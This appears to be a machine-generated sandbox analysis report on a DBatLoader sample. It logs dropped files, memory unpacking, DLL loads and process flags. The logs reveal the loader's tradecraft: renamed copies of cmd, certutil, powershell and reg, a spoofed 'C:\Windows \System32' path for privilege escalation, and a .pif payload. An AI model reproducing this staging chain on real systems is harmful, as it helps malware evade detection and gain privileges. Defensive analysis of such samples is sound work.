        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???y.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???y.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???y.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ????.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ????.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ????.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???2.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???2.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???2.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??????s.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??????s?s.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??????s.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\xkn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\xkn.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows \System32\per.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
        Source: rPO767575.cmdStatic file information: File size 4230931 > 1048576
        Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000F.00000002.1476976535.0000019BC2D60000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000016.00000000.1518864581.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000016.00000002.1531678646.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.15.dr
        Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1445144057.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1446065132.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1447868032.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1458781343.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1459173324.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1464587284.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1469344959.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1465532908.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1473566813.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1469668285.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000000.1473921005.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000002.1478186750.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1506732117.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1478851202.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000002.1499793462.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000000.1498344325.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000002.1518104695.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000000.1507039984.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000000.1541220928.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000002.1545227076.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.1551820937.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.1548125938.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000000.1552277477.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000002.1552927917.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.1553226732.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.1554180486.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000000.1554505024.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000002.1555442519.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe,
        Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000011.00000000.1479565533.00007FF6BB8EA000.00000002.00000001.01000000.00000007.sdmp, xkn.exe.13.dr
        Source: Binary string: certutil.pdb source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.dr
        Source: Binary string: reg.pdb source: extrac32.exe, 0000000B.00000002.1468605418.0000022844600000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000002.1499281229.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000013.00000000.1498746952.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.11.dr
        Source: Binary string: powershell.pdb source: xkn.exe, 00000011.00000000.1479565533.00007FF6BB8EA000.00000002.00000001.01000000.00000007.sdmp, xkn.exe.13.dr
        Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1445144057.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1446065132.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1447868032.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1458781343.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1459173324.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1464587284.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1469344959.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1465532908.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1473566813.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1469668285.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000000.1473921005.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000002.1478186750.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1506732117.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1478851202.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000002.1499793462.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000000.1498344325.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000002.1518104695.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000000.1507039984.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000000.1541220928.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000002.1545227076.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.1551820937.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.1548125938.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000000.1552277477.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000002.1552927917.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.1553226732.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.1554180486.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000000.1554505024.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000002.1555442519.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 000
        Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000F.00000002.1476976535.0000019BC2D60000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000016.00000000.1518864581.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000016.00000002.1531678646.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.15.dr
        Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000B.00000002.1468605418.0000022844600000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000002.1499281229.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000013.00000000.1498746952.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.11.dr
        Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.dr

        Data Obfuscation

        barindex
        Detected unpacking (creates a PE file in dynamic memory)
        Source: C:\Users\Public\Libraries\Ping_c.pifUnpacked PE file: 31.2.Ping_c.pif.2940000.0.unpack
        Yara detected DBatLoader
        Source: Yara matchFile source: 31.2.Ping_c.pif.2940000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 31.2.Ping_c.pif.2940000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000001F.00000002.2708904655.0000000002940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: alpha.exe.3.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02957CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,31_2_02957CA8
        Source: alpha.exe.3.drStatic PE information: section name: .didat
        Source: kn.exe.7.drStatic PE information: section name: .didat
        Source: per.exe.15.drStatic PE information: section name: .imrsiv
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F83668 push rsp; ret 9_2_00007FF607F83669
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029432FC push eax; ret 31_2_02943338
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029692FC push 02969367h; ret 31_2_0296935F
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295D204 push ecx; mov dword ptr [esp], edx31_2_0295D209
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0294635C push 029463B7h; ret 31_2_029463AF
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0294635A push 029463B7h; ret 31_2_029463AF
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029690AC push 02969125h; ret 31_2_0296911D
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029691F8 push 02969288h; ret 31_2_02969280
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02969144 push 029691ECh; ret 31_2_029691E4
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02946730 push 02946772h; ret 31_2_0294676A
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0294672E push 02946772h; ret 31_2_0294676A
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0294C4E4 push ecx; mov dword ptr [esp], edx31_2_0294C4E9
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0294D518 push 0294D544h; ret 31_2_0294D53C
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0294CB64 push 0294CCEAh; ret 31_2_0294CCE2
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0294C892 push 0294CCEAh; ret 31_2_0294CCE2
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02957884 push 02957901h; ret 31_2_029578F9
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029568BE push 0295696Bh; ret 31_2_02956963
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029568C0 push 0295696Bh; ret 31_2_02956963
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02957ED0 push 02957F08h; ret 31_2_02957F00
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02952ED8 push 02952F4Eh; ret 31_2_02952F46
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02959E74 push 02959EACh; ret 31_2_02959EA4
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02952FE4 push 02953031h; ret 31_2_02953029
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02952FE3 push 02953031h; ret 31_2_02953029
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0296CF18 push eax; ret 31_2_0296CFE8
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02967F60 push 02968124h; ret 31_2_0296811C
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02957C5C push 02957C9Eh; ret 31_2_02957C96
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02955DF4 push ecx; mov dword ptr [esp], edx31_2_02955DF6

        Persistence and Installation Behavior

        barindex
        Drops PE files with a suspicious file extension
        Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\Ping_c.pifJump to dropped file
        Drops executables to the windows directory (C:\Windows) and starts them
        Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\per.exeJump to behavior
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Windows \System32\per.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
        Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\Ping_c.pifJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Windows \System32\per.exeJump to dropped file

        Boot Survival

        barindex
        Drops PE files to the user root directory
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02959EB0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,31_2_02959EB0
        Source: C:\Users\Public\Libraries\Ping_c.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
        Source: C:\Users\Public\Libraries\Ping_c.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\alpha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
